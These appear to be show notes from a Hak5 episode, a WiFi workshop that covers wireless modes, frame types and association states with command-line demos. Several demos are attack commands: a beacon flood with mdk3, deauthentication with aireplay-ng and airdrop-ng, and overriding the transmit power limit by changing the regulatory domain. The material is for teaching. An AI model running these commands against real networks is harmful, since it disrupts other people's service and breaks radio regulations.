Hosted by Darren Kitchen and Shannon Morse. New episodes Tuesdays.
Put together by a band of IT ninjas, security professionals and hardcore gamers, Hak5 isn't your typical tech show. We take on hacking in the old-school sense, covering everything from network security, open source and forensics, to DIY modding and the homebrew scene. Then we wrap it all up with a... Read More
This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.
This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.
6 Modes of WiFi
---------------
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)
Demo: Managed
-------------
iwconfig wlan0 mode manged
iwconfig wlan0 essid pineapple
iwconfig wlan0
*more on associations soon
Ad-Hoc - peer to peer
Demo: Ad-Hoc
------------
iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc
Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)
Demo: Monitor Mode
------------------
airmon-ng start wlan2
tshark -i mon0
Modes and your NIC
------------------
Not all wireless NICs are made the same.
Depending on chipset and other factors your adapter may not support all 6 modes.
Demo: Determinte your NICs available modes
------------------------------------------
airmon-ng # find phy#
iw phy phy1 info | grep -A8 modes
A Word On Transmit Power
------------------------
Like channels, transmit power, or txpower, is regulated by country.
In the US, txpower has a max of 500 Milli Watts, or 20 dBm
This is hard coded into the Linux Kernel (though can be changed)
Easier than changing the kernel is to move to a country with nicer laws
Demo: Moving to Bolivia
-----------------------
iw reg get
iw reg set BO
iwconfig wlan2 txpower 30
3 States of Wifi
----------------
State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated
WiFi Frames
-----------
Frames: Simply Data Packets
Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
Source and Destination
Ether Type (What Protocol)
Frame Check Sequence:
CRC
Say that again?
WiFi Frames:
Management Frames
Control Frames
Data Frames
Management Frames:
Beacons
Probes
Authentications
Associations
Beacons:
Advertise the network
Specify SSID (network name), Channels and other capabilities
Demo: Beacon Flood Attack
-------------------------
airmon-ng start wlan2
mdk3 mon0 b -f ssidlist.txt
Demo: Analyze Beacon Frame
--------------------------
gksudo wireshark & disown
wlan.fc.subtype == 0x08
# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
# IEEE 802.11 Management Frame > Tagged parameters
Probe Frame:
Probe Request - Are you my friend?
Probe Response
- Includes capability info
Demo: Is that a probe in your pocket or are you just happy to see me?
---------------------------------------------------------------------
# Look what's coming out of everyone's devices!
airmon-ng start wlan2
airodump-ng mon0
Authentication:
Authentication
- Open, WEP (Shared), WPA, WPA2, WPA-Radius
Deauthentication
Association:
Association Request - Can we be friends?
Association Response
Disassociation
Demo: Analyze Connection to Open AP
-----------------------------------
# start wirehark on wlan2
# Silence the noise!
wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08
# Passive Scan should not generate any frames
iw dev wlan2 scan passive | grep SSID
# Active Scan
iw wlan2 scan | grep SSID
Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
Display only RESPONSES by changing 0x04 to 0x05
airmon-ng start wlan2
airodump-ng mon0
# find channel for AP "pineapple"
iwconfig wlan2 channel 11
iwconfig mon0 channel 11
iwconfig wlan2 | grep Frequency
gksudo wireshark & disown
# Filter for just pineapple and not beacons
wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
# Associate
# Filter for just phone and pineapple
wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
# Probe Request SSID=Broadcast = null probe request
Deauthentication
----------------
Remember trust?
Demo: Deauthenticate my phone!
------------------------------
iwconfig mon0 channel 11
aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0
Demo: Hella Deauthentication with Airdrop-ng
--------------------------------------------
# Begin demo connected to anything but pineapple
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules
Control Frames:
---------------
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.
Data Frames:
------------
Kittens!
20 days ago
Hackers!! Our new episode of Hak5 will be posting soon! It's jam packed with epic interviews this week, so stay tuned!
20 days ago
@michael_a_nass Are you enjoying the awesomeness that is Hack Across America?
20 days ago
@jardinesoftware Thanks for the bump! The Throwing Star LAN Tap Pro is one of my favorite tools (though, I prefer soldering mine! :) -@snubs
about a month ago
Employers want social media passwords, US gets a #CPO, and #TheOnion! All that and more this time on #ThreatWire! http://t.co/SrZpicvnt6
about a month ago
#Installing #Solar panels, #Google #Chrome #extensions, and more on @Hak5! http://t.co/QppYLgZpi5
about a month ago
Legalizing #Internet eavesdropping, #LivingSocial is #hacked, and more on this weeks #ThreatWire! http://t.co/xyIxzy8kes
